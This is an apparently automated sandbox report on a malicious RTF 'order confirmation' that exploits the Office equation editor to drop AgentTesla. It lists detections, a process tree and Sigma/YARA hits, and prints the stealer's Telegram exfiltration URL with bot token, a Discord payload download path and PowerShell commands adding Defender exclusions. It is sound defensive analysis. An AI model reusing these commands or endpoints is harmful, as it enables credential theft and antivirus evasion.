Analysis Report order-confirmation.doc__.rtf

Overview

General Information

Sample Name: order-confirmation.doc__.rtf
Analysis ID: 425839
MD5: 3d081d1bd8aa121b56754528d7b13981
SHA1: 87db49098bc0aa0b88dfa5c7f3954544dd3058df
SHA256: 4435554b4906c5a294e08a579a0bd6e7ae78bd0dcce24a7225a29ab2a731bd28
Tags: rtf

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell adding suspicious path to exclusion list
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Drops PE files to the startup folder
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Non Interactive PowerShell
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2432 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2676 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • srt.exe (PID: 2692 cmdline: C:\Users\user\AppData\Roaming\srt.exe MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
      • powershell.exe (PID: 2328 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 3028 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 3000 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2172 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe (PID: 2888 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
        • powershell.exe (PID: 2160 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 944 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 1572 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 2028 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 1664 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 3068 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2252 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • srt.exe (PID: 1916 cmdline: C:\Users\user\AppData\Roaming\srt.exe MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
      • srt.exe (PID: 2656 cmdline: C:\Users\user\AppData\Roaming\srt.exe MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
  • 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe (PID: 2612 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
    • powershell.exe (PID: 3016 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2488 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2940 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2976 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • svchost.exe (PID: 2232 cmdline: 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1656309456", "Chat URL": "https://api.telegram.org/bot1870790471:AAFpD5zuAlCeqAqJnBFTcvC5WkaPoWtoQ9c/sendDocument"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000026.00000002.2211744541.0000000004053000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000026.00000002.2211744541.0000000004053000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
0000000C.00000002.2182891401.0000000004783000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
38.2.svchost.exe.4053840.8.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
38.2.svchost.exe.4053840.8.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4783840.10.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4783840.10.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.47c8660.9.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 162.159.130.233, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2676, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2676, TargetFilename: C:\Users\user\AppData\Roaming\srt.exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: C:\Users\user\AppData\Roaming\srt.exe, CommandLine: C:\Users\user\AppData\Roaming\srt.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\srt.exe, NewProcessName: C:\Users\user\AppData\Roaming\srt.exe, OriginalFileName: C:\Users\user\AppData\Roaming\srt.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2676, ProcessCommandLine: C:\Users\user\AppData\Roaming\srt.exe, ProcessId: 2692
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\srt.exe, ParentImage: C:\Users\user\AppData\Roaming\srt.exe, ParentProcessId: 2692, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force, ProcessId: 2328

Malware Analysis System Evasion:

Sigma detected: Powershell adding suspicious path to exclusion list
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\srt.exe, ParentImage: C:\Users\user\AppData\Roaming\srt.exe, ParentProcessId: 2692, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force, ProcessId: 3028

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: order-confirmation.doc__.rtf; Avira: detected
Found malware configuration
Source: 00000027.00000002.2169471559.0000000002B11000.00000004.00000001.sdmp; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1656309456", "Chat URL": "https://api.telegram.org/bot1870790471:AAFpD5zuAlCeqAqJnBFTcvC5WkaPoWtoQ9c/sendDocument"}
Multi AV Scanner detection for submitted file
Source: order-confirmation.doc__.rtf; ReversingLabs: Detection: 40%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\srt.exe; Joe Sandbox ML: detected
Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe; Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\srt.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown; HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Directory queried: number of queries: 2505
Source: C:\Users\user\AppData\Roaming\srt.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Users\user\AppData\Roaming\srt.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\srt.exe; File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\srt.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\srt.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Users\user\AppData\Roaming\srt.exe; File opened: C:\Users\user\
Source: global traffic; DNS query: name: cdn.discordapp.com
Source: global traffic; TCP traffic: 192.168.2.22:49168 -> 162.159.130.233:443
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 162.159.130.233:80
Source: global traffic; HTTP traffic detected: GET /attachments/843685789120331799/847476783744811018/OtI.exe HTTP/1.1, Connection: Keep-Alive, Host: cdn.discordapp.com
Source: Joe Sandbox View; IP Address: 162.159.130.233
Source: Joe Sandbox View; JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE4C9C3-349E-46EF-BF24-C3A751787722}.tmp
Source: unknown; DNS traffic detected: queries for: cdn.discordapp.com
Source: srt.exe, 00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmp; String found in binary or memory: https://api.telegram.org/bot1870790471:AAFpD5zuAlCeqAqJnBFTcvC5WkaPoWtoQ9c/
Source: srt.exe, 00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmp; String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown; Network traffic detected: HTTP traffic on port 49168 -> 443

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Roaming\srt.exe
Source: C:\Users\user\AppData\Roaming\srt.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\srt.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe; Memory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_0049B2CC NtQuerySystemInformation,36_2_0049B2CC
                      Source: C:\Users\user\AppData\Roaming\srt.exe File created: C:\Windows\Resources\Themes\d01f0bR8dD56989
                      Source: C:\Users\user\AppData\Roaming\srt.exe Code function: 3_2_00360488
                      Source: C:\Users\user\AppData\Roaming\srt.exe Code function: 3_2_00360B09
                      Source: C:\Users\user\AppData\Roaming\srt.exe Code function: 3_2_00360B70
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_025A1D3A
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Code function: 12_2_002F0488
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Code function: 12_2_002F0B09
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Code function: 12_2_002F0B70
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_02851C60
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Code function: 19_2_00260488
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Code function: 19_2_00260B70
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Code function: 19_2_00260691
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_01F61BE2
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe Code function: 38_2_00500488
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe Code function: 38_2_00500B70
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe Code function: 38_2_00500691
                      Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe F684F3065013459E4B2F23B77CA621D61690B13D016C7A9146D8111ED1CF0EB1
                      Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\srt.exe F684F3065013459E4B2F23B77CA621D61690B13D016C7A9146D8111ED1CF0EB1
                      Source: Joe Sandbox View Dropped File: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe F684F3065013459E4B2F23B77CA621D61690B13D016C7A9146D8111ED1CF0EB1
                      Source: srt.exe, 00000003.00000002.2187112009.00000000080E0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
                      Source: classification engine Classification label: mal100.troj.adwa.expl.evad.winRTF@57/24@2/1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_01D0ACEE AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_01D0ACB7 AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_01D5ACEE AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_01D5ACB7 AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_01DFACEE AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_01DFACB7 AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_01EDACEE AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_01EDACB7 AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_01B9ACEE AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_01B9ACB7 AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_01CAACEE AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_01CAACB7 AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_020DACEE AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_020DACB7 AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_01D5ACEE AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_01D5ACB7 AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_01F4ACEE AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_01F4ACB7 AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_0057ACEE AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_0057ACB7 AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_01E9ACEE AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 27_2_01E9ACB7 AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_01E0ACEE AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_01E0ACB7 AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_01F4ACEE AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_01F4ACB7 AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_01CFACEE AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_01CFACB7 AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_0049ACEE AdjustTokenPrivileges
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_0049ACB7 AdjustTokenPrivileges
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$der-confirmation.doc__.rtf
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC3AC.tmp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............................v.......................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......6.9.8.9.\.s.v.c.h.o.s.t...e.x.e. .-.F.o.r.c.e...................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................0.......x.......................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................0...............................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................0...............................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................0.......w.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................\...............................0.......................l.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................\...............................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................\...............................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................\.......7.......................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............(.......\...............................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............(.......\...............................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............(.......0...............................0......./.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............(.......0...............................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............(.......0...............................0.......;...............|.......H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............(.......0.......*.......................0.......;.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......U.......................0.......G...............".......H...............
